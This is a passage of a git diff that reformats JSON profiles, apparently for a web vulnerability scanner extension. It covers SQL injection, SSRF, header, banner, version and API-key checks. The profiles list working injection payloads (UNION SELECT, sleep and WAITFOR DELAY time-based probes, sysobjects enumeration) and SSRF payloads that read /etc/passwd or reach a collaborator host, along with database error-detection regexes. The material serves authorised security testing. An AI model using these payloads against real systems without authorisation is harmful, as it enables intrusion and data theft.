rollback","true,Or,com\\.frontbase\\.jdbc","true,Or,org\\.h2\\.jdbc","true,Or,Unexpected end of command in statement \\[\"","true,Or,Unexpected token.*?in statement \\[","true,Or,org\\.hsqldb\\.jdbc","true,Or,CLI Driver.*?DB2","true,Or,DB2 SQL error","true,Or,\\bdb2_\\w+\\(","true,Or,SQLSTATE.+SQLCODE","true,Or,com\\.ibm\\.db2\\.jcc","true,Or,Zend_Db_(Adapter|Statement)_Db2_Exception","true,Or,Pdo[./_\\\\]Ibm","true,Or,DB2Exception","true,Or,Warning.*?\\Wifx_","true,Or,Exception.*?Informix","true,Or,Informix ODBC Driver","true,Or,ODBC Informix driver","true,Or,com\\.informix\\.jdbc","true,Or,weblogic\\.jdbc\\.informix","true,Or,Pdo[./_\\\\]Informix","true,Or,IfxException","true,Or,Warning.*?\\Wingres_","true,Or,Ingres SQLSTATE","true,Or,Ingres\\W.*?Driver","true,Or,com\\.ingres\\.gcf\\.jdbc","true,Or,Dynamic SQL Error","true,Or,Warning.*?\\Wibase_","true,Or,org\\.firebirdsql\\.jdbc","true,Or,Pdo[./_\\\\]Firebird","true,Or,Microsoft Access (\\d+ )?Driver","true,Or,JET Database Engine","true,Or,Access Database Engine","true,Or,ODBC Microsoft Access","true,Or,Syntax error \\(missing operator\\) in query expression","true,Or,Driver.*? SQL[\\-\\_\\ ]*Server","true,Or,OLE DB.*? SQL Server","true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+Driver","true,Or,Warning.*?\\W(mssql|sqlsrv)_","true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}","true,Or,System\\.Data\\.SqlClient\\.SqlException","true,Or,(?s)Exception.*?\\bRoadhouse\\.Cms\\.","true,Or,Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}","true,Or,\\[SQL Server\\]","true,Or,ODBC SQL Server Driver","true,Or,ODBC Driver \\d+ for SQL Server","true,Or,SQLServer JDBC Driver","true,Or,com\\.jnetdirect\\.jsql","true,Or,macromedia\\.jdbc\\.sqlserver","true,Or,Zend_Db_(Adapter|Statement)_Sqlsrv_Exception","true,Or,com\\.microsoft\\.sqlserver\\.jdbc","true,Or,Pdo[./_\\\\](Mssql|SqlSrv)","true,Or,SQL(Srv|Server)Exception","true,Or,SQL syntax.*?MySQL","true,Or,Warning.*?\\Wmysqli?_","true,Or,MySQLSyntaxErrorException","true,Or,valid MySQL result","true,Or,check the manual that corresponds to your (MySQL|MariaDB) server version","true,Or,Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027","true,Or,MySqlClient\\.","true,Or,com\\.mysql\\.jdbc","true,Or,Zend_Db_(Adapter|Statement)_Mysqli_Exception","true,Or,Pdo[./_\\\\]Mysql","true,Or,MySqlException","true,Or,\\bORA-\\d{5}","true,Or,Oracle error","true,Or,Oracle.*?Driver","true,Or,Warning.*?\\W(oci|ora)_","true,Or,quoted string not properly terminated","true,Or,SQL command not properly ended","true,Or,macromedia\\.jdbc\\.oracle","true,Or,oracle\\.jdbc","true,Or,Zend_Db_(Adapter|Statement)_Oracle_Exception","true,Or,Pdo[./_\\\\](Oracle|OCI)","true,Or,OracleException","true,Or,PostgreSQL.*?ERROR","true,Or,Warning.*?\\Wpg_","true,Or,valid PostgreSQL result","true,Or,Npgsql\\.","true,Or,PG::SyntaxError:","true,Or,org\\.postgresql\\.util\\.PSQLException","true,Or,ERROR:\\s\\ssyntax error at or near","true,Or,ERROR: parser: parse error at or near","true,Or,PostgreSQL query failed","true,Or,org\\.postgresql\\.jdbc","true,Or,Pdo[./_\\\\]Pgsql","true,Or,PSQLException","true,Or,SQL error.*?POS([0-9]+)","true,Or,Warning.*?\\Wmaxdb_","true,Or,DriverSapDB","true,Or,com\\.sap\\.dbtech\\.jdbc","true,Or,SQLite/JDBCDriver","true,Or,SQLite\\.Exception","true,Or,(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException","true,Or,Warning.*?\\W(sqlite_|SQLite3::)","true,Or,\\[SQLITE_ERROR\\]","true,Or,SQLite error \\d+:","true,Or,sqlite3.OperationalError:","true,Or,SQLite3::SQLException","true,Or,org\\.sqlite\\.JDBC","true,Or,Pdo[./_\\\\]Sqlite","true,Or,SQLiteException","true,Or,Warning.*?\\Wsybase_","true,Or,Sybase message","true,Or,Sybase.*?Server message","true,Or,SybSQLException","true,Or,Sybase\\.Data\\.AseClient","true,Or,com\\.sybase\\.jdbc"],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"SQLi-Error-SQLmap","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65,32,36,1,2,6,5,64,0,3,4],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SQLi-Error-SQLmap", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@GochaOqradze", + "Payloads": [ + "true,\u0027", + "true,\u0027\u0027", + "true,`", + "true,``", + "true,,", + "true,\"", + "true,\"\"", + "true,/", + "true,//", + "true,\\", + "true,\\\\", + "true,;", + "true,\u0027 or \"", + "true,-- or # ", + "true,\u0027 OR \u00271", + "true,\u0027 OR 1 -- -", + "true,\" OR \"\" \u003d \"", + "true,\" OR 1 \u003d 1 -- -", + "true,\u0027 OR \u0027\u0027 \u003d \u0027", + "true,\u0027\u003d\u0027", + "true,\u0027LIKE\u0027", + "true,\u0027\u003d0--+", + "true, OR 1\u003d1", + "true,\u0027 OR \u0027x\u0027\u003d\u0027x", + "true,\u0027 AND id IS NULL; --", + "true,\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027UNION SELECT \u00272", + "true,%00", + "true,/*…*/ ", + "true,+", + "true,||", + "true,%", + "true,@variable", + "true,@@variable", + "true,#", + "true,AND 1", + "true,AND 0", + "true,AND true", + "true,AND false", + "true,1-false", + "true,1-true", + "true,1*56", + "true,-2", + "true,1\u0027 ORDER BY 1--+", + "true,1\u0027 ORDER BY 2--+", + "true,1\u0027 ORDER BY 3--+", + "true,1\u0027 ORDER BY 1,2--+", + "true,1\u0027 ORDER BY 1,2,3--+", + "true,1\u0027 GROUP BY 1,2,--+", + "true,1\u0027 GROUP BY 1,2,3--+", + "true,\u0027 GROUP BY columnnames having 1\u003d1 --", + "true,-1\u0027 UNION SELECT 1,2,3--+", + "true,\u0027 UNION SELECT sum(columnname ) from tablename --", + "true,-1 UNION SELECT 1 INTO @,@", + "true,-1 UNION SELECT 1 INTO @,@,@", + "true,1 AND (SELECT * FROM Users) \u003d 1", + "true,\u0027 AND MID(VERSION(),1,1) \u003d \u00275\u0027;", + "true,\u0027 and 1 in (select min(name) from sysobjects where xtype \u003d \u0027U\u0027 and name \u003e \u0027.\u0027) --", + "true,,(select * from (select(sleep(10)))a)", + "true,%2c(select%20*%20from%20(select(sleep(10)))a)", + "true,\u0027;WAITFOR DELAY \u00270:0:10\u0027--", + "true,#\t Hash comment", + "true,/*", + "true,-- -", + "true,;%00", + "true,`" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Exception (condition )?\\d+\\. Transaction rollback", + "true,Or,com\\.frontbase\\.jdbc", + "true,Or,org\\.h2\\.jdbc", + "true,Or,Unexpected end of command in statement \\[\"", + "true,Or,Unexpected token.*?in statement \\[", + "true,Or,org\\.hsqldb\\.jdbc", + "true,Or,CLI Driver.*?DB2", + "true,Or,DB2 SQL error", + "true,Or,\\bdb2_\\w+\\(", + "true,Or,SQLSTATE.+SQLCODE", + "true,Or,com\\.ibm\\.db2\\.jcc", + "true,Or,Zend_Db_(Adapter|Statement)_Db2_Exception", + "true,Or,Pdo[./_\\\\]Ibm", + "true,Or,DB2Exception", + "true,Or,Warning.*?\\Wifx_", + "true,Or,Exception.*?Informix", + "true,Or,Informix ODBC Driver", + "true,Or,ODBC Informix driver", + "true,Or,com\\.informix\\.jdbc", + "true,Or,weblogic\\.jdbc\\.informix", + "true,Or,Pdo[./_\\\\]Informix", + "true,Or,IfxException", + "true,Or,Warning.*?\\Wingres_", + "true,Or,Ingres SQLSTATE", + "true,Or,Ingres\\W.*?Driver", + "true,Or,com\\.ingres\\.gcf\\.jdbc", + "true,Or,Dynamic SQL Error", + "true,Or,Warning.*?\\Wibase_", + "true,Or,org\\.firebirdsql\\.jdbc", + "true,Or,Pdo[./_\\\\]Firebird", + "true,Or,Microsoft Access (\\d+ )?Driver", + "true,Or,JET Database Engine", + "true,Or,Access Database Engine", + "true,Or,ODBC Microsoft Access", + "true,Or,Syntax error \\(missing operator\\) in query expression", + "true,Or,Driver.*? SQL[\\-\\_\\ ]*Server", + "true,Or,OLE DB.*? SQL Server", + "true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+Driver", + "true,Or,Warning.*?\\W(mssql|sqlsrv)_", + "true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}", + "true,Or,System\\.Data\\.SqlClient\\.SqlException", + "true,Or,(?s)Exception.*?\\bRoadhouse\\.Cms\\.", + "true,Or,Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}", + "true,Or,\\[SQL Server\\]", + "true,Or,ODBC SQL Server Driver", + "true,Or,ODBC Driver \\d+ for SQL Server", + "true,Or,SQLServer JDBC Driver", + "true,Or,com\\.jnetdirect\\.jsql", + "true,Or,macromedia\\.jdbc\\.sqlserver", + "true,Or,Zend_Db_(Adapter|Statement)_Sqlsrv_Exception", + "true,Or,com\\.microsoft\\.sqlserver\\.jdbc", + "true,Or,Pdo[./_\\\\](Mssql|SqlSrv)", + "true,Or,SQL(Srv|Server)Exception", + "true,Or,SQL syntax.*?MySQL", + "true,Or,Warning.*?\\Wmysqli?_", + "true,Or,MySQLSyntaxErrorException", + "true,Or,valid MySQL result", + "true,Or,check the manual that corresponds to your (MySQL|MariaDB) server version", + "true,Or,Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027", + "true,Or,MySqlClient\\.", + "true,Or,com\\.mysql\\.jdbc", + "true,Or,Zend_Db_(Adapter|Statement)_Mysqli_Exception", + "true,Or,Pdo[./_\\\\]Mysql", + "true,Or,MySqlException", + "true,Or,\\bORA-\\d{5}", + "true,Or,Oracle error", + "true,Or,Oracle.*?Driver", + "true,Or,Warning.*?\\W(oci|ora)_", + "true,Or,quoted string not properly terminated", + "true,Or,SQL command not properly ended", + "true,Or,macromedia\\.jdbc\\.oracle", + "true,Or,oracle\\.jdbc", + "true,Or,Zend_Db_(Adapter|Statement)_Oracle_Exception", + "true,Or,Pdo[./_\\\\](Oracle|OCI)", + "true,Or,OracleException", + "true,Or,PostgreSQL.*?ERROR", + "true,Or,Warning.*?\\Wpg_", + "true,Or,valid PostgreSQL result", + "true,Or,Npgsql\\.", + "true,Or,PG::SyntaxError:", + "true,Or,org\\.postgresql\\.util\\.PSQLException", + "true,Or,ERROR:\\s\\ssyntax error at or near", + "true,Or,ERROR: parser: parse error at or near", + "true,Or,PostgreSQL query failed", + "true,Or,org\\.postgresql\\.jdbc", + "true,Or,Pdo[./_\\\\]Pgsql", + "true,Or,PSQLException", + "true,Or,SQL error.*?POS([0-9]+)", + "true,Or,Warning.*?\\Wmaxdb_", + "true,Or,DriverSapDB", + "true,Or,com\\.sap\\.dbtech\\.jdbc", + "true,Or,SQLite/JDBCDriver", + "true,Or,SQLite\\.Exception", + "true,Or,(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException", + "true,Or,Warning.*?\\W(sqlite_|SQLite3::)", + "true,Or,\\[SQLITE_ERROR\\]", + "true,Or,SQLite error \\d+:", + "true,Or,sqlite3.OperationalError:", + "true,Or,SQLite3::SQLException", + "true,Or,org\\.sqlite\\.JDBC", + "true,Or,Pdo[./_\\\\]Sqlite", + "true,Or,SQLiteException", + "true,Or,Warning.*?\\Wsybase_", + "true,Or,Sybase message", + "true,Or,Sybase.*?Server message", + "true,Or,SybSQLException", + "true,Or,Sybase\\.Data\\.AseClient", + "true,Or,com\\.sybase\\.jdbc" + ], + "Tags": [ + "SQLi", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "SQLi-Error-SQLmap", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 65, + 32, + 36, + 1, + 2, + 6, + 5, + 64, + 0, + 3, + 4 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SSRF-Collaborator.bb b/profiles/SSRF-Collaborator.bb index f710da6..913a719 100755 --- a/profiles/SSRF-Collaborator.bb +++ b/profiles/SSRF-Collaborator.bb @@ -1 +1,102 @@ -[{"Name":"SSRF-Collaborator","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}","dict://{BC}","sftp://{BC}","ldap://{BC}","gopher://{BC}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SSRF-Collaborator", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,http://{BC}", + "true,dict://{BC}", + "true,sftp://{BC}", + "true,ldap://{BC}", + "true,gopher://{BC}" + ], + "Encoder": [ + " " + ], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "Collaborator", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 9, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "SSRF-Collaborator", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "SSRF with payload: \u003cbr\u003e\u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SSRF-URLScheme.bb b/profiles/SSRF-URLScheme.bb old mode 100644 new mode 100755 index 116f78c..e5afda3 --- a/profiles/SSRF-URLScheme.bb +++ b/profiles/SSRF-URLScheme.bb @@ -1 +1,100 @@ -[{"Name":"SSRF-URLScheme","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["file:///etc/passwd","file://\\/\\/etc/passwd"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-URLScheme","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SSRF-URLScheme", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,file:///etc/passwd", + "true,file://\\/\\/etc/passwd" + ], + "Encoder": [ + " " + ], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 9, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "SSRF-URLScheme", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SecurityHeaders.bb b/profiles/SecurityHeaders.bb old mode 100644 new mode 100755 index 496a0c1..d6254db --- a/profiles/SecurityHeaders.bb +++ b/profiles/SecurityHeaders.bb @@ -1 +1,64 @@ -[{"Name":"SecurityHeaders","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Cache-Control","true,Or,X-Frame-Options","true,Or,X-Content-Type-Options:nosniff","true,Or,Strict-Transport-Security","true,Or,X-XSS-Protection","true,Or,Content-Security-Policy"],"Tags":["All"],"PayloadResponse":false,"NotResponse":true,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Missing Security Headers","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Missing security headers detected.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SecurityHeaders", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Cache-Control", + "true,Or,X-Frame-Options", + "true,Or,X-Content-Type-Options:nosniff", + "true,Or,Strict-Transport-Security", + "true,Or,X-XSS-Protection", + "true,Or,Content-Security-Policy" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Missing Security Headers", + "IssueSeverity": "Low", + "IssueConfidence": "Certain", + "IssueDetail": "Missing security headers detected.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ServerBanner.bb b/profiles/ServerBanner.bb new file mode 100755 index 0000000..78582e4 --- /dev/null +++ b/profiles/ServerBanner.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "ServerBanner", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Server:.*[0-9].*" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ServerBanner", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Server banner found: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Software_Version_revealed.bb b/profiles/Software_Version_revealed.bb old mode 100644 new mode 100755 index aeaf404..a0eb659 --- a/profiles/Software_Version_revealed.bb +++ b/profiles/Software_Version_revealed.bb @@ -1 +1,60 @@ -[{"Name":"Software_Version_revealed","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?","true,Or,(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)(?:-((?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Software Version revealed","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Software Version revealed","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Software_Version_revealed", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?", + "true,Or,(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)(?:-((?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Software Version revealed", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Software Version revealed", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SonarQube_API_Key_Docs.bb b/profiles/SonarQube_API_Key_Docs.bb old mode 100644 new mode 100755 index 75a3b8a..31225f6 --- a/profiles/SonarQube_API_Key_Docs.bb +++ b/profiles/SonarQube_API_Key_Docs.bb @@ -1 +1,59 @@ -[{"Name":"SonarQube_API_Key_Docs","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)sonar.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{40}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"SonarQube Api Key Docs","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SonarQube_API_Key_Docs", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + 